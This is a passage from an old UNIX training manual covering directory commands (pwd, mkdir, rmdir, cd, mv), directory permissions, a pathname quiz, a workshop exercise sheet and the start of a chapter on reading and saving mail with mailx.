+ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $pwd ³ +³ /user0/teacher ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +Notice that this is an absolute pathname. This is the pathname +of the current working directory. +4.2 Creating Directories + + +Directories are created by the following command: + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: mkdir [options] º +º º +º options - see man pages for a complete list º +º º +º dirname - name of the new directory (absolute or º +º relative pathname). º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +If the option to change permission mode is not given, the +directory will have default permissions set to read,write,execute +for the user and read and execute for group and others. The +files . (dot) and .. (dot dot) are created automatically. In +order to create a sub-directory, you must have write permission +on the parent directory. The owner id and the group id are set +to the real users id and group id, respectively. + +4.3 Removing Directories + + +Directories can be deleted using the rmdir command. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: rmdir [options] º +º º +º options - see man pages for a complete list º +º º +º dirname - the directory to remove, it must be empty. º +º º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $pwd ³ +³ /user0/teacher ³ +³ $ls -la ³ +³ total 5 ³ +³ drwxr-xr-x 2 teacher class 512 Jul 18 08:12 . ³ +³ drwxrwxr-x 5 root root 2048 Jul 1 13:14 .. ³ +³ $rmdir teacher ³ +³ rmdir:teacher:Directory does not exist ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + + +Normally, directories are deleted using the rmdir command. +Before the directory can be removed, it must be empty; that is, +it must not contain any files. Notice that in the above example +two files are present, . (dot) and .. (dot). Remember, these +refer to the current working directory and its parent. They +cannot be removed. +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $rmdir . ³ +³ rmdir: .: Can't remove current directory or .. ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +For the purposes of deleting a directory, the directory is empty +if it contains only two files, namely . (dot) and .. (dot dot). +4.4 Changing Directories + + +To "move around" in the filesystem, use the cd (change directory) +command. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: cd [dirname] º +º º +º dirname - If not specified, the value of the $HOME º +º shell variable will be used as the new º +º current working directory. º +º º +º If the directory given is an absolute pathname º +º that directory is the new current working º +º directory. A relative pathname can also be º +º given. º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $cd /user0/teacher ³ +³ $pwd ³ +³ /user0/teacher ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +The current working directory is now /user0/teacher. + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $cd memos ³ +³ $pwd ³ +³ /user0/teacher/memos ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +This command will look for a subdirectory called memos under the +current working directory. If it is found, it will become the +new working directory; otherwise, an error will occur. + +Error messages beginning with "cannot access file..." often +indicate that the pathname is incorrect or misspelled. +4.5 Renaming Directories + + +The mv (move) command can also be used to rename a directory. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: mv º +º º +º dirname - name of the source directory º +º target - target directory name º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $mv users newusers ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + + +This will have the effect of changing the name of the directory +users into newusers. The permissions on the directory will +remain the same. + + +NOTE: All files and subdirectories in the directory newusers + now have new absolute pathnames. +4.6 The directories . (dot) and .. (dot dot) + + +The filename . (dot) represents the current working directory; +and the filename .. (dot dot) represent the directory one level +above the current working directory, often referred to as the +parent directory. If we enter the command to show a listing of +the current working directories files and use the -a option to +list all the files and the -l option provides the long listing, +this is the result. + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $ls -la ³ +³ total 975 ³ +³ drwxrwxr-x 4 teacher class 2048 Jul 16 17.56 . ³ +³ drwxr-xr-x 60 root 1536 Jul 13 14:18 .. ³ +³ ---------- 1 teacher class 4210 May 1 08:27 .profile ³ +³ -rwxr-xr-x 1 teacher class 1948 May 12 13:42 memo ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +The ls -la command displays access modes, number of links, the +owner, the group, size, etc. of files in a directory; but also +displays the characteristics of the current working directory and +its parent. The first entry is the entry for the current +directory. The owner is teacher and the group is class. The +second entry is the parent directory. It is one level up from +the current working directory. It is owned by the root +directory. + +Instead of asking for information on all of the files in a +directory, you can request just the information on the current +working directory. + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $ls -ld ³ +³ drwxrwxr-x 4 teacher class 2048 Jul 16 17:56 . ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +The response from the command simply shows the long information +for the current working directory . (dot). +Information can also be obtained for the parent of the current +working directory by using its name as an argument. + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $ls -ld .. ³ +³ drwxr-xr-x 60 root root 1536 Jul 13 14:18 .. ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +Here's the long list of the current working directories parent. +(.. is the shorthand representation of the current working +directories parent) + +Both of the directory names . (dot) and .. (dot dot) can be used +as arguments to commands. To change the parent of the current +working directory into the current working directory, the command +is: + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $pwd ³ +³ /user0/teacher ³ +³ $cd .. ³ +³ $pwd ³ +³ /user0 ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +The current working directory is the former parent. + +This is all very interesting but what good is it? You can +specify the current working directory or its parent without +typing the entire absolute pathname. It can also be handy when +giving arguments to UNIX commands. + +Why are the pathnames sjones/chem and ./sjones/chem equivalent? +4.7 Directory Access Modes + + +Directory access modes are listed and organized in the same +manner as any other file. There are a few differences that need +to be mentioned. + + + +4.7.1 Read + + +Access to a directory means that the user can read the contents. +The user can look at the filenames inside the directory. + + + +4.7.2 Write + + +Access means that the user can add or delete files to the +contents of the directory. + + + +4.7.3 Execute + + +Executing a directory doesn't really make a lot of sense so think +of this as a traverse permission. This access allows the user to +reference the directory name in a command. The reference is not +necessarily explicit, since the shell deduces the absolute +pathname of a command from the user's environment. For example, +the shell knows that the full pathname of the ls command is +/bin/ls. A user must have execute access to the bin directory in +order to execute ls. + +If traverse permissions are denied, others cannot change to it or +through it. Another user can't do a cd to the protected +directory or any subdirectory beneath it. + IN CLASS QUIZ + ÚÄÄÄÄÄÄÄÄ¿ + ³ / ³ + ÀÄÄÄÄÂÄÄÄÙ + ³ + ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ + ³ ³ ³ ³ ³ ³ + ÚÄÄÄÄÁÄÄÄÄÄ¿ ÚÄÄÄÄÁÄÄÄÄ¿ ÚÄÄÄÄÁÄÄÄÄ¿ ÚÄÄÄÄÁÄÄÄÄ¿ ÚÄÄÄÄÁÄÄÄÄ¿ ÚÄÄÄÄÁÄÄÄÄ¿ + ³ bin ³ ³ tmp ³ ³ etc ³ ³ mnt ³ ³ lib ³ ³ dev ³ + ÀÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÂÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÙ + ³ + ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ + ³ ³ ³ ³ + ÚÄÄÄÄÄÁÄÄÄÄÄ¿ ÚÄÄÄÄÁÄÄÄÄ¿ ÚÄÄÄÄÁÄÄÄÄ¿ ÚÄÄÄÄÁÄÄÄÄ¿ + ³ Uni1 ³ ³ Uni2 ³ ³ Uni3 ³ ³ Uni4 ³ + ÀÄÄÄÄÄÂÄÄÄÄÄÙ ÀÄÄÄÄÂÄÄÄÄÙ ÀÄÄÄÄÂÄÄÄÄÙ ÀÄÄÄÄÂÄÄÄÄÙ + {1} ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÁÄÄÄÄÄ¿ +ÚÄÄÄÄÁÄÄÄÄÄ¿ ÚÄÄÄÄÄÁÄÄÄÄÄ¿ ÚÄÄÄÄÁÄÄÄÄ¿ ÚÄÄÄÄÄÁÄÄÄÄÄ¿ ÚÄÄÄÄÄÁÄÄÄÄÄ¿ ÚÄÄÄÄÁÄÄÄÄ¿ ÚÄÄÄÄÁÄÄÄÄ¿ ÚÄÄÄÄÁÄÄÄÄ¿ ÚÄÄÄÄÁÄÄÄÄ¿ ÚÄÄÄÄÁÄÄÄÄ¿ +³ filea ³ ³ fileb ³ ³ Dira ³ ³ filea ³ ³ Filea ³ ³ file1 ³ ³ File2 ³ ³ file3 ³{5} ³ Dir1 ³ ³ Dir2 ³ +ÀÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÂÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÂÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÂÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÂÄÄÄÙ ÀÄÄÄÄÂÄÄÄÄÙ + ³ ³ ³ ³ ³ + ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ +ÚÄÄÄÄÁÄÄÄÄÄ¿ ÚÄÄÄÄÄÁÄÄÄÄÄ¿ ÚÄÄÄÄÁÄÄÄÄ¿ ÚÄÄÄÄÄÁÄÄÄÄÄ¿ ÚÄÄÄÄÁÄÄÄÄ¿ ÚÄÄÄÄÁÄÄÄÄ¿ ÚÄÄÄÄÁÄÄÄÄ¿ ÚÄÄÄÄÁÄÄÄÄ¿ +³ filea ³ ³ Dirb ³ ³ fileb ³ {2} {3} ³ filea ³ ³ Filea ³ {6}³ File1a ³ ³ file1b ³ ³ Dir2a ³ +ÀÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÂÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÂÄÄÄÄÙ + ³ ³ +Write the complete pathname for the 5. ________________________________ ÚÄÄÄÄÁÄÄÄÄ¿ ÚÄÄÄÄÄÄÁÄÄÄÄÄÄ¿ {7} +files numbered above. {4} ³ filea ³ ÚÄÄÄÄÁÄÄÄÄ¿ ÚÄÄÄÄÁÄÄÄÄ¿ + 6. ________________________________ ÀÄÄÄÄÄÄÄÄÄÙ ³ File2aa ³ ³ file2ab ³ +1. _______________________________ 8. You are in /mnt/Uni1 and want #1. ÀÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÙ + 7. ________________________________ +2. _______________________________ ______________________________________ + +3. _______________________________ Write the minimum pathname needed for 9. You are in /mnt/Uni3/File2 and want #4 + each of the following: +4. _______________________________ ______________________________________ +4.7.4 Typical Root Directory + + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $ ls -FC / ³ +³ ³ +³ ³ +³ Student/ bin/ lib/ stand/ u2/ user2/ ³ +³ ³ +³ Students/ bad/ lisp/ tmp/ unix* usr/ ³ +³ ³ +³ Support/ dev/ lost+found/ tmp.sh unix.bak* usr2/ ³ +³ ³ +³ etc/ mnt/ tmp1/ unix.test* usr3/ a.out* ³ +³ ³ +³ foo rel_notes tmp2/ user0/ install/ shlib/ ³ +³ ³ +³ u1/ user1/ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + NOTES +ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ +Workshop 4 + + +This workshop will reinforce your understanding of the topics +presented in this chapter. Login to the Multimax using the +username and password from the previous workshop. All students +should complete the entire workshop. You may need to work in a +team on the computer exercises. + +DESK EXERCISES + + +1. What is a directory? + + + + +2. What is an absolute path name? + + + + + +3. What is a relative path name? + + + + + +4. What command will create a directory? + + + + +5. What command will remove a directory? + + + + +6. What command is used to change from one directory to + another? + + + + +7. How would you change the name of a directory? + + + + + + Continue on the next page +8. What do the files . (dot) and .. (dot dot) represent? + + + + + + +9. What does execute permission on a directory mean? + + + + + + +COMPUTER EXERCISES + + +10. Login to the Multimax. + + + + + +11. What is the absolute pathname of your current working + directory? Hint: pwd + + + + + +12. Type cd etc + + What message do you get? Can you explain why? + + + + +13. Type cd /etc + + What is your current working directory? Why did this + happen? + + + + + +14. Enter the command that will return you to your home + directory. + + + + Continue on the next page + +15. Enter the command that will change to your current working + directories parent. + + + + + + +16. List the contents of your current working directory + + + + + +17. List the permissions, ownership, size, etc. of your current + directories parent. + + + + + +18. Enter the command to change to your home directory. Create + a new subdirectory with a name of your choice. + + + + + +19. Change the current working directory to the subdirectory you + just created. + + + + + +20. Rename the subdirectory to Student. Is this the same + subdirectory as everyone else in the class? Why? + + + + + +21. Change to your home directory and delete the subdirectory + Student. + + + + + +22. Logout of the Multimax and the Annex. + NOTES +ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ +5. COMMUNICATION UTILITIES + + +This chapter will deal with the utilities that allow one user to +communicate with another. Some of these utilities require the +other user to be logged in and others do not. + +The mail utility can be used to send messages to one or more +users. It is not necessary for the user that is receiving the +message to be logged in. The mail utility delivers the message +to a file belonging to the recipient. The user will be notified +that a mail message exists. Messages can be saved or deleted and +a reply sent. + +The talk utility is an interactive session that allows each user +to send message simultaneously to each other. Both users must be +currently logged in for this utility to work. + +The write utility is a one-way communication. It allows you to +send a message to another user. The user must be logged in and no +reply is possible. + +5.1 Sending Electronic Mail + + +The basic command line format for sending mail is: + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: mailx [options] [user1[usern]] º +º º +º options - see man pages for a complete list º +º º +º user1[usern] - one or more users to get the mail º +º message º +º º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +The username is the name assigned by the system administrator to +a user on the UNIX system (for example, rharding). The username +can also include a system name if the recipient is on another +UNIX system that can communicate with the sender's (for example, +sys2!rharding). Let's assume that the recipient is on the local +UNIX system. + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $mailx rharding(Ret) ³ +³ Subject: ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +Now enter the subject of your message followed by a (Ret). The +cursor will appear on the next line. Simply start typing the +message. There is no limit to the length of a message. When you +have finished, send it by typing Ctrl-D on a new line. + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $mailx rharding(Ret) ³ +³ Subject: Work schedule(Ret) ³ +³ Please check the bulletin board(Ret) ³ +³ for the new work schedule.(Ret) ³ +³ Ctrl-D ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +The shell prompt on the last line indicates that the message has +been queued (placed in a waiting line) and will be sent. +5.2 Reading Mail + + +To read your mail enter: + + +Example: + +................................................................. +. $mailx . +................................................................. + +Executing this command places you in the command mode of mailx. +If there are no mail messages waiting to be read, you will see +the following message on the screen: + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $mailx ³ +³ No mail for teacher ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +Of course, your username will appear instead of 'teacher'. + +When a mail message appears in the recipient's mailbox, the +following message will appear on the screen. + + +Example: + +................................................................. +. you have mail . +................................................................. + +This notice will appear when you login to the system or upon +return to the shell from another procedure. +When you have been notified of mail waiting to be read, enter the +command to enter mail. The screen will look something like this: + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $mailx ³ +³ ³ +³ mailx version 3.1 Type ? for help. ³ +³ "/usr/mail/teacher": 3 messages 3 new ³ +³ >N 1 bhood Fri Jul 13 13:01 21/324 Review session³ +³ N 2 class2 Fri Jul 13 14:53 15/211 Meeting notice³ +³ N 3 phajny Fri Jul 13 16:53 11/272 Reorganization³ +³ ? ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +This first line indicates the version of mailx that is being +used. In this case, version 3.1. There is a reminder that help +is available by typing the ?. The second line shows the path +name of the file used as input (usually the same as the username) +and a count of the total number of messages and their status. +The messages are numbered in sequence with the latest one +received on the bottom of the list. To the left of the sequence +numbers, there may be a status indicator; N for new, U for +unread. The > symbol points to the current message. The other +fields in the header line show the login of the sender, day, +date, and time it was delivered. The next field has the number +of lines and characters in the message. The last field is the +subject of the message; it might be blank. + +To read the mail messages you can do any of the following steps: + + +(Ret) - This will cause the current message to + be displayed. The current message is + the once indicated by the > sign. + +p (Ret) - This is equivalent to pressing the (Ret) + key with no argument. The current + message will be displayed. + +p 2 (Ret) - You can press p (for print) or t (for + type) followed by the message number(s). + +p teacher (Ret) - This will print all messages from user + teacher. +5.3 Saving Mail + + +All messages that are not specifically deleted are saved when +quitting mailx. Messages that have been saved are placed in a +file in the home directory called mbox. The mbox file is the +default. It is possible to save them in a file of the users +choice. Messages that have not been read are held in the +mailbox. The command to save messages comes in two forms. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: S [msglist] º +º º +º msglist = º +º º +º n message number n the current message º +º º +º ^ the first undeleted message º +º º +º $ the last message º +º º +º * all messages º +º º +º n-m an inclusive range of message numbers º +º º +º user all messages from user º +º º +º /string All messages with string in the subject line º +º (case is ignored) º +º º +º :c all messages of type c where c is: º +º º +º d - deleted messages º +º n - new messages º +º o - old messages º +º r - read messages º +º u - unread messages º +º º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ +Messages specified by the msglist argument are saved in a file in +the current directory named for the author of the first message +in the list. If the username 'teacher' sent the message and you +entered: + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ? S * ³ +³ "teacher" [New file] 11/268 ³ +³ ? ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +The mail message has been saved into a file in your current +directory called 'teacher'. If you want to save the file in +another filename, you can do that with the second method of +saving mail. Basically, it works the same as S; but it allows +you to save the mail to a file you specify. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: s [msglist] [file1] º +º º +º msglist 